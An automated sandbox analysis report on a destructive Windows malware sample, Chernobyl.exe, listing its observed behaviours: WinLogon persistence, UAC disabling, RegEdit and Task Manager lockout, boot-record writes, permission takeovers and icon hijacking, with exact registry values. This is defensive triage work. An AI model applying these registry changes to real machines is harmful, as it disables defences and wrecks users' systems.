Analysis Overview
SHA256
bab3c6bad2a2b69ed5a4162d0645ce78f48aa9d9f0736f20a0dd4abc460b4d6a
Threat Level: Known bad
The file Chernobyl.exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
UAC bypass
Modifies WinLogon for persistence
Disables Task Manager via registry modification
Disables RegEdit via registry modification
Possible privilege escalation attempt
Modifies system executable filetype association
Checks computer location settings
Modifies file permissions
Modifies WinLogon
Checks whether UAC is enabled
Writes to the Master Boot Record (MBR)
Sets desktop wallpaper using registry
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
System policy modification
Suspicious use of WriteProcessMemory
Modifies File Icons
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Modifies Control Panel
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-01 20:59
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 20:59
Reported
2024-06-01 21:01
Platform
win10v2004-20240508-en
Max time kernel
114s
Max time network
64s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\kill.ico | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| File opened for modification | C:\Windows\System32\clutter.ico | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| File opened for modification | C:\Windows\System32\wallpaper.jpg | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.bmp" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\cluttscape.exe | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| File opened for modification | C:\Windows\cluttscape.exe | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Enumerates physical storage devices
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\WallpaperStyle = "2" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Modifies File Icons
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe
"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\cmd.exe
